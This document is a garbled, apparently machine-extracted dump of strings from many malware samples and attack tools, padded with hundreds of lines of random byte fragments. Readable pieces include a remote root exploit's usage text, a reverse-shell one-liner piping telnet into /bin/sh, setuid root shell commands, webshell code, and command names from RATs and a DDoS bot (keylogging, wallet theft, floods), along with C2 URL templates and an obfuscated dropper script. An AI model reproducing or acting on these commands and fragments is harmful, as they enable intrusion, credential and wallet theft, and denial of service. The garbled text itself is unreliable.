-uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
Unavailable msie 5.5;\
Unavailable r>/b
Unavailable i2)s
Unavailable ntdll
Unavailable e@[^]
Unavailable h<=d
Unavailable gs:z_oe
Unavailable <zhs
Unavailable ct3y
Unavailable xsvt
Unavailable pdnb
Unavailable changing the code in this way will not affect the quality of the resulting optimized code.
Unavailable )wtc
Unavailable }ph+
Unavailable t$pi
Unavailable gvn0
Unavailable j*wm
Unavailable \10$
Unavailable f90u
Unavailable w}&?
Unavailable ewa;
Unavailable a84.u
Unavailable `@tj
Unavailable rtllookupfunctionentry
Unavailable h4;d
Unavailable 1n5n
Unavailable =lre
Unavailable q2s.
Unavailable t$@l
Unavailable gqhpp
Unavailable iowriteerrorlogentrykeremoveentrydevicequeuesesingleprivilegecheckiobuilddeviceiocontrolrequestkeremovedevicequeueiofcompleterequestkeinitializespinlockmmisnonpagedsystemaddressvalidiocreatedevicekefreleasespinlockfromdpcleveld
Unavailable $tvr
Unavailable _y)j
Unavailable 2a,lc
Unavailable portions copyright (c) 1983,97 borland
Unavailable =1#v
Unavailable #'00dcj
Unavailable o)q,h#
Unavailable =jv8
Unavailable a2`ij1
Unavailable 4,@a
Unavailable 0a^h
Unavailable ty@8p
Unavailable rpbh
Unavailable http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
Unavailable :q|f<
Unavailable i>#*q6
Unavailable elfstatus: ok--scryptstratum+tcp://cmd.so/challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sedit_server
Unavailable i.=)7
Unavailable ;?k;
Unavailable |$ d
Unavailable z[y^
Unavailable stack memory was corrupted
Unavailable 0ebq
Unavailable noobyprotect se 1.1.8.0
Unavailable kill you%4.2f kb
Unavailable |$`ss
Unavailable zeu[j,(
Unavailable odiz
Unavailable qqqqqs3
Unavailable eykqc nh
Unavailable kz\j
Unavailable internet connect failed!woodtale technology incflyingbird technology limitedneoact co., ltd.amazgame age internet technology co., ltdemg technology limitedzemi interactive co., ltd337 technology limitedrunewaker entertainment0ncproxyxlluniscribe.dllws2_32.dlljdnsapi.dllx64.datlspyb2excalibur\\bin\\shell.pdbb
Unavailable v1.0---------------------
Unavailable thursday
Unavailable exe.tsohcvsexe.ssaslexe.rerolpxeexe.erolpxeiexe.23lldnurexe.dmcexe.llikksatlld.23lenreklld.esablenreklld.esabtpyrclld.trcvsmlld.lldtnpaehssecorptegsserddacorptegayrarbildaolteslortnoctnerrucnur\\noisrevtnerruc\\23metsys\\\\23metsys\\nib.elcycer$%toormetsys%a
Unavailable <&>v
Unavailable kc{8
Unavailable w|:yi~
Unavailable y7.x0s
Unavailable "#lq
Unavailable e3lh
Unavailable t~e3
Unavailable `vector constructor iterator'
Unavailable unsigned
Unavailable f4@"h
Unavailable 6dnfg8upn5fbzggj8licqhblqvlnuy19z5zcnknfdsdhuzui8otesbodrzfcqckr/safe/record.php_rm.battry\x0d\x0a\x09\x09\x09\x09 del %sext.orgappdata\\local\\temp\\micromedia\\mediacenter.exe\\projects\\c#\\sayad\\source\\binder\\obj\\debug\\binder.pdbdelphinative.dllsqlite3.dllb
Unavailable t$$f;
Unavailable ;m=bz
Unavailable lz5m
Unavailable vguc
Unavailable j`h`
Unavailable ihb&%
Unavailable ;ayg
Unavailable d6hq
Unavailable chown root:root /tmp/.scsi/dev/bin/gshchmod 4777 /tmp/.scsi/dev/bin/gsh_lib_version,%02d%03dtransitstorestr = 'echo -n \"%s\" | store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, var_name)the nopen-args provided are injected into infile if it is a valid -i do not autokill after 5 hours__strtoll_internal__strtoul_internalefdghijklmnopqrsutg8hcj hcf lcf0lcnghhcj0hcf@lcf0lcn8hgetexecnameinvalid option `__fpstartghfijklmnopqrstuvxwhttp_referer=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"exec /usr/share/redmin/cgi/redminop=cron&action=once&frame=crononceframe&cronk=cronv&croncommand=%2ftmp%2ftmpwatch&time=12%3a12+01%2f28%2f2005
Unavailable z;l232
Unavailable u-xv
Unavailable cast to smaller type causing loss of data
Unavailable yj;b`
Unavailable )=?a
Unavailable d$xl
Unavailable i{y3
Unavailable rz"p
Unavailable +--x
Unavailable nscortr.dllnscortr1.dllsina.exewrite file ok...error: can not open socket....error in parametrs:usage: @<get/put> <ip> <port> <file>error: not connect...connect successful....clnt <%d> rqstd n ll kllclnt <%d> rqstd swapcld nt sgnl prcs grpcld nt sgnl prntork error/var/tmp/gogomyfilename= |%s|mypid,mygid=mypid=|%d| mygid=|%d|/var/tmp/taskmydevname= |%s|
Unavailable d$`e3
Unavailable atavawh
Unavailable xogt
Unavailable - z.0
Unavailable `tek
Unavailable 2gm2
Unavailable all rights reserved.
Unavailable \\\\
Unavailable f{d+
Unavailable ycadc/kr rst`h
Unavailable fjpn&y
Unavailable ?c{^$
Unavailable zkh&e8p
Unavailable r_!g
Unavailable f'':
Unavailable hp77
Unavailable "td9
Unavailable u#_'
Unavailable d,a(
Unavailable t(d;
Unavailable df{lm9w{zzqw`}{z.4_qqd9ux}bq
Unavailable f$toj
Unavailable $<8+
Unavailable ~__tm
Unavailable id-ce-keyusagekey usageu
Unavailable x0*u
Unavailable `otdu';
Unavailable ury5;
Unavailable ppm{
Unavailable )9s5
Unavailable ^zv<
Unavailable &mqo
Unavailable ]^sp
Unavailable }hgj9
Unavailable dest
Unavailable )5s^
Unavailable g9jz
Unavailable dlum
Unavailable yl vi
Unavailable @5re
Unavailable _u,l
Unavailable aceaz
Unavailable d$8%
Unavailable hnetcfg.hnetgetsharingservicespagehnetcfg.icfgetoperationalmodehnetcfg.icfgetdynamicfwportshnetcfg.hnetfreefirewallloggingsettingshnetcfg.hnetgetshareandbridgesettingshnetcfg.hnetgetfirewallsettingspagei386\\desertwinterdriver.pdbperforming ur-specific post-install...timeout waiting for the \"caninstallnow\" event from the implant-specific exe!straitshooter30.exestandalonegrok_2.1.1.1m
Unavailable %w"%
Unavailable 0.@p
Unavailable 6pnr
Unavailable fqh2
Unavailable }na'
Unavailable lwizvmfejikcinzqndi
Unavailable $lhar
Unavailable i('k
Unavailable getlocaleinfow
Unavailable u" "
Unavailable z0xcw'
Unavailable mos=
Unavailable ve.u
Unavailable l$@d
Unavailable jg[ru
Unavailable 7uvo
Unavailable p:ak=0#d
Unavailable ty w|
Unavailable software\\microsoft\\windows nt\\currentversion\\svchostregsvr32.exe /s \"%s\"help and support%systemroot%\\system32\\svchost.exe -k netsvcssystem\\currentcontrolset\\servicesd
Unavailable vaig
Unavailable @tcpffbpiavwritememinjectoravremotethreadavcommandcontrollerfoxcon@foxcon.cominstallerfromdll.dllbzh91ay&s
Unavailable f;\$ds
Unavailable f+nw
Unavailable k&>.yc
Unavailable #uxjn
Unavailable @f`t
Unavailable )ipv
Unavailable pphr
Unavailable @80t
Unavailable stubpath
Unavailable x'ex
Unavailable ;xoz
Unavailable &|1g
Unavailable coq7
Unavailable #ib?
Unavailable .textbss
Unavailable -,(4ab;
Unavailable khcb
Unavailable __int64
Unavailable swh\
Unavailable wg@e
Unavailable ^*t81
Unavailable \\release\\bypassuacdllw
Unavailable >mzt
Unavailable vws4
Unavailable emh<g
Unavailable xxx]h
Unavailable fugf
Unavailable q]k$
Unavailable w4^t6q
Unavailable t$li
Unavailable g(z}
Unavailable }?9'
Unavailable ryg@@z
Unavailable :3ef
Unavailable [f7u
Unavailable +>_+
Unavailable \$0a
Unavailable \$(h
Unavailable {%#'
Unavailable i-tz
Unavailable %rxp
Unavailable ^az&
Unavailable %uuuu3
Unavailable dl9;hl
Unavailable 3c3%
Unavailable h~p'
Unavailable @sda
Unavailable loadlibraryariff
Unavailable ev@t
Unavailable b|x0;
Unavailable 36,>
Unavailable ch,b
Unavailable deletesubkeyget_machinenameget_usernameget_lastwritetimegetvolumeinformationosfullnamedownloaddatafm|'|'|nd|'|'|rn|'|'|sc~|'|'|scpk|'|'|cam|'|'|usb video device[endof]rs|'|'|proc|'|'|k|'|'|rg|'|'|~|'|'|kl|'|'|ret|'|'|pl|'|'|lv|'|'|prof|'|'|~|'|'|un|'|'|~[endof]p[endof]orcus.commandmanagementorcus.commands.orcus.config.orcus.connection.orcus.core.orcus.exeorcus.extensions.orcus.installationpromptformorcus.mainform.orcus.native.orcus.plugins.orcus.plugins.dllorcus.properties.orcus.protection.orcus.share.orcus.sharedorcus.staticcommandsorcus.utilities.\\projects\\orcus\\source\\orcus..orcus.plugins.dll.zip.orcus.shared.dll.zip.orcus.shared.utilities.dll.zip.orcus.staticcommands.dll.ziphvnccommunicationhvncactionhvncdesktoprequestkeylogcommandget_keylogfilelivekeyloggercommandorcus.staticcommands, version=prepareorcusfiletoremoveconvertfromorcusvaluekindboot.ldrd:\\workplug2.5plug3.0shell6gulp
Unavailable g+[m
Unavailable d;}l[$
Unavailable ?_5f}1
Unavailable create`
Unavailable getconsolecp
Unavailable b00dc=
Unavailable o9`m
Unavailable x01wb
Unavailable t5lcf
Unavailable !,x< w
Unavailable opera.exe
Unavailable usvwatauavawh
Unavailable \\systemroot\\c
Unavailable )#~_
Unavailable ( 8px
Unavailable t5e3
Unavailable a0`'
Unavailable mhr*
Unavailable proxy_info: automatic proxy url => %s proxy_info: connection type => %d proxy_info: proxy server => %s proxy_info: bypass list => %s internetqueryoption failed with getlasterror() %dd:\\hellsing\\release\\exe\\exe\\\\dbgv.sysxkat_binrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
Unavailable ph5u
Unavailable ()ljava/util/set;(ljava/lang/string;)vljava/lang/exception;oooy32too.javabbfwkdljava/lang/process;getparametersimio.javaljavax/swing/jlist;-(ljava/lang/string;)ljava/lang/stringbuilder;ljava/io/inputstream;vfnnnrof.exnnnroeolsnnfwgetpropertyjava/io/filenotfoundexceptionllolp;cjhgreshhnuf stackmaptableonfwwa(c)ljava/lang/stringbuilder;lesia$fffgss;<clinit>()ljava/io/inputstream;openconnection gjhgreshhnijhgreshhrtsjhgreshhot.sjhgreshhihjhgreshht;)oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/urlcreated-by: 1.7.0-b147 (oracle corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1c4c4c4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginffffdd none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadfx0zaqrkxuvgbh0qndrjvxywgg4tgh8ahqoavqqsnyo0nelxfjaadi0nfqyesl1fbbnntfospibmadwnptqxpsdkwuuee2ucgr0z0);-10<bfunction fl(){var a0);else if(navigator.mimetypes);b.href/presults.jsp128.164.107.221)[0].clientwidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jviewportfqv2d0zah1vgdxgzvg9cowycawkctzacbxscbfokaamhufvuwf5evvyvdvtur18ba1qdau8hqjgeufyeaez4sbecek1ftxsdulvasquare ad tag (tile adrandnum cellspacing\\n//-->\\n</script>//-->' 2287974446noscrbeg -- start adblade -->' 3427054556 while (i >return '<table width</scr' s.substring(0, i /></a></noscript>' else { isemail ).submit(); borderpub-8301011321395982apiclientconfigfunction/.test(pa.tostring())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816ewc-2sl.gif)}music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createelement('form');c.actionjavascript:falses.onmessage){j.error('an instance without whenready or onmessage makes no sense');throw new error('anan;}else hsprintfwindow,jo.getuserid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
Unavailable a_a^a]a\^
Unavailable h)ie
Unavailable wvutu
Unavailable hdrc
Unavailable e[x_-
Unavailable ~^}u
Unavailable +8):
Unavailable @w<^
Unavailable fc9/i#g
Unavailable accessories\\wordpad.exegorillanation.combefore editing the content of a cookie, you should close all windows of internethttp://nirsoft.cjb.neta
Unavailable cx$\
Unavailable l$lqwpv
Unavailable '{w?x
Unavailable \$ uvwatauavawh
Unavailable ohqw
Unavailable %d) command:%s
Unavailable gfe"
Unavailable +phj
Unavailable <;'u
Unavailable {q!g<
Unavailable j3j9
Unavailable `template static data member destructor helper'
Unavailable 9r16
Unavailable )db+km<
Unavailable 9a44
Unavailable |;<m
Unavailable o<`
Unavailable encryptpe_init
Unavailable \-----------------------------7d414e351603fa-----------------------------6e8fad908fe13c
Unavailable mid'
Unavailable '|n6
Unavailable uvwatauavawh
Unavailable qf8sgr8w+
Unavailable ici:
Unavailable s00dc
Unavailable drvr
Unavailable w>$d
Unavailable absmj
Unavailable tbdy
Unavailable cddafmt
Unavailable >b{\
Unavailable y01wb
Unavailable val is %d
Unavailable kqz*
Unavailable d:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\release\\servicedll.pdbe:\\programs\\luriddownloaderluriddownloader for falcondllservicetrojan\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\etenfalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89madonna\x00jesus/iupw82/netstatefucknodagainiloudermaocrpq2.cgiclnpp5.cgidqpq3ll.cgidieosn83.cgirwpq1.cgi/ccmwhite/cmwhite/crpwhite/dfwhite/query.txt/ufwhite/cgl-bin/clnpp5.cgi/cgl-bin/crpq2.cgi/cgl-bin/dwpq3ll.cgi/cgl-bin/owpq4.cgi/cgl-bin/rwpq1.cgi/trandocs/mm//trandocs/netstatnfal.exelinlinvman7nfp4r9wpowerpnt.exe%appdata%\\microsoft\\windows\\%homepath%server2008server2003server2003r2server2008r2%homedrive%%comspec%m
Unavailable fm|t
Unavailable \$4startserviceaavgtray.exe2
Unavailable xe(/1
Unavailable t/fd
Unavailable tlsalloc
Unavailable c$k~
Unavailable <0u>
Unavailable h$zc
Unavailable t$0@
Unavailable p!^#
Unavailable ia44
Unavailable e}g'
Unavailable t$xa
Unavailable };,z)
Unavailable t$$j@
Unavailable gk`vn
Unavailable x9|h
Unavailable ;5v(
Unavailable appdata\\local\\temp\\_.net_\\msiexec.exetype:on_execuid:%spriv:%sarch:x%sgend:%scores:%iver:%snet:%s|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s||type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|filesearch.stoprapidgetlayer4.slowlorisrudyddos.war.smartviewftp.upload%s %s :%s layer4 combo flood: stopped%s %s :%s irc war: flood started [type: %s | target: %s]%s %s :%s ftp upload: failedathena v2%s %s :%s ecf flood: stopped [total connections: %ld | rate: %ld connections/second]arme flood on %s/%s:%i for %i seconds [host confirmed vulnerable rapid http combo flood on %s:%i for %i secondsbegan flood: %i connections every %i ms to %s:%iipkiller>athenaathena=shit!athena-v1btc wallet.dat file foundminecraft lastlogin file foundprocess '%s' was found and scheduled for deletion upon next rebootuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; trident/4.0; .net clr 1.1.4322; .net clr 2.0.503l3; .net clr 3.0.4506.2152; .net clr 3.5.30729; msoffice 12)rapid connect/disconnectbtc wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533d9226e4c1ce0a9815dbeb19235ae4x-ts-rule-name: %sx-ts-rule-patternid: %ux-ts-botid: %sx-ts-domain: %sx-ts-sessionid: %sx-ts-header-cookie: %sx-ts-header-referer: %sx-ts-header-acceptencoding: %sx-ts-header-acceptlanguage: %sx-ts-header-useragent: %s_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllu
Unavailable a variable is being used without being initialized.
Unavailable s2r"
Unavailable s watauavawh
Unavailable 420o
Unavailable smc
Unavailable 9"re
Unavailable 3;p*&v
Unavailable 2zq
Unavailable l$pm
Unavailable %!ps-adobe-2.0 epsf-1.2?_
Unavailable getstring(), false
Unavailable >,($
Unavailable binbuckset_accountset_passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
Unavailable qg#m
Unavailable slyri
Unavailable ijkllgdmawhram0vn36bgiochyr3l45xchnydxqvhmloa2ptbh8voycdtw==efghlgdmawhrl41sf36bgiocl6r3dk8=cmd.exe /q /c \"%s\"\\\\.\\pipe\\%s%s%dthis is a service executable! couldn't start directly.\\\\.\\pipe\\termhlp_communicatontermhlp_stdouttermhlp_stdinsvchostdllserver.dllsvchostdll: registerservicectrlhandler %s failed\\nbtstat.exedataversionexlpykh~mzccrv|mplpykcchvq{phlcc\\jmmzqkizmlvpqccl$,pqr0/0b0h0q0w0k0qsuvwhht hu[1001=cmd.exe1003=shellexecutea1002=/c del /q %s1004=setthreadpriorityssonsvr.exeutnavlu.dllut@
Unavailable fk4f+d
Unavailable >"r&
Unavailable _466
Unavailable jl!n
Unavailable `;w|
Unavailable p5]<
Unavailable j8-9
Unavailable f)ed
Unavailable v! r4
Unavailable h_0@
Unavailable id-at-serialnumberecdsa with sha256a
Unavailable (n4e
Unavailable p_j^
Unavailable m_xp-t
Unavailable 63;z
Unavailable lin(
Unavailable g;&zr
Unavailable yvyu
Unavailable cer3
Unavailable v4teu}m]
Unavailable _ n9
Unavailable vjk^
Unavailable h!d$ i
Unavailable t#b@
Unavailable kaotx
Unavailable !-b[
Unavailable jqdi
Unavailable w:h;
Unavailable z4)l]
Unavailable tq d
Unavailable (%)o
Unavailable 0>=s
Unavailable qs^a
Unavailable "<il
Unavailable t$0a
Unavailable rjsx
Unavailable d>(u
Unavailable exitprocessu
Unavailable !y3~z
Unavailable 6(uj1
Unavailable a3ra
Unavailable hrk\
Unavailable p0v3
Unavailable ca,a$
Unavailable z0x03
Unavailable <7<:3k
Unavailable ^m#e{c
Unavailable qqid
Unavailable c<yh
Unavailable wil|
Unavailable q$d3
Unavailable zre`
Unavailable %p0@
Unavailable b`@t
Unavailable \$ yy
Unavailable (n~y'
Unavailable iphlpsvc.tmpr
Unavailable #uja
Unavailable need a girl to love qq 65665651 email master#h4cker.us [ ] spawning half a shell...set fso=server.createobject(\"scr\"&\"ipt\"&\"ing\"&\".\"&\"fil\"&\"esy\"&\"ste\"&\"mob\"&\"jec\"&\"t\")checkdirisokwritecheckdirisokdelbianlia
Unavailable `d c
Unavailable suvw
Unavailable mz>`
Unavailable d|.h
Unavailable <r}c0^n
Unavailable _tdt
Unavailable e2g2
Unavailable [vprotect]
Unavailable v6e>`"(5
Unavailable a(j7
Unavailable &o!o
Unavailable h0w((e
Unavailable $aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaao
Unavailable _yap
Unavailable |$`ci
Unavailable `vector destructor iterator'
Unavailable 3s~0
Unavailable |$ uatauavawh
Unavailable b$i_|
Unavailable %temp%\\ielogs\\mspub.exe%temp%\\\\notepad.exe%4d-%02d-%02d %02d:%02d:%02d internet_open_type_preconfig%4d%02d%02d%02d%02d%02dmozilla/4.0 (compatible; msie 8.0; windows nt 5.1; sv1; .net clr 2.0.50727.42)\\mozilla\\firefox\\profiles\\\\auto.cfg/ncsi.txt/en-us/default.aspxcmd /cappdata.
Unavailable ,=>b
Unavailable f3,2
Unavailable tgyrw
Unavailable _tyh
Unavailable dkrl
Unavailable !|yc
Unavailable 8ei?
Unavailable @+a:
Unavailable u3ffu
Unavailable ;xjy!l
Unavailable .xj>hf
Unavailable \\result.txtby:zt qq:376789051(
Unavailable zo0q
Unavailable rapidstarttech.stlintelrs.exestealer.properties.resources.resources\\stealer\\obj\\x86\\release\\stealer.pdbintelrapidstart.exeintelrapidstart.exe.configmscf
Unavailable 7r32
Unavailable `local static thread guard'
Unavailable %ls_%ls_%ls_%d.~tmp
Unavailable %.?g
Unavailable hqd.
Unavailable h(ed
Unavailable cmd.exee:\\debugbmw1.0\\bmw\\release\\large.pdbc:\\bao\\bmw\\release\\bmw.pdb:\\bmw(aes)\\bmw\\release\\large.pdb\\adobe gamma loader.lnk\\hp printer.lnk%s\\spoolsv.exeregbin@
Unavailable >~{^
Unavailable {imh
Unavailable uvwrqsp
Unavailable }4sa
Unavailable 'azu
Unavailable u4h+
Unavailable e+000
Unavailable =4<,
Unavailable **ace**`
Unavailable v]t1d
Unavailable mb1q
Unavailable uvj@h
Unavailable l>ev
Unavailable cna=^
Unavailable ?="6
Unavailable dkfkck
Unavailable a hch
Unavailable [_@&
Unavailable d0(h
Unavailable g$p3lb
Unavailable 2.1]
Unavailable q@~'
Unavailable w^kx
Unavailable 1#inf
Unavailable t$ wh
Unavailable pye\
Unavailable =wvc
Unavailable w}@h
Unavailable 99e2428cca4309c68aaf8c616ef3306582a64513e55c786a864bc83dafe0c78585b692047273b0e55275102c664c5217e76b8e67f35fce385e4328ee1ad139ea6aa26345c4f93000dbbc7ef1579d4fhttp/1.1 200 ok
Unavailable get_form1h
Unavailable findnextfilea
Unavailable ]r,4(
Unavailable ]n?p3
Unavailable l97tah
Unavailable d&-b>/6
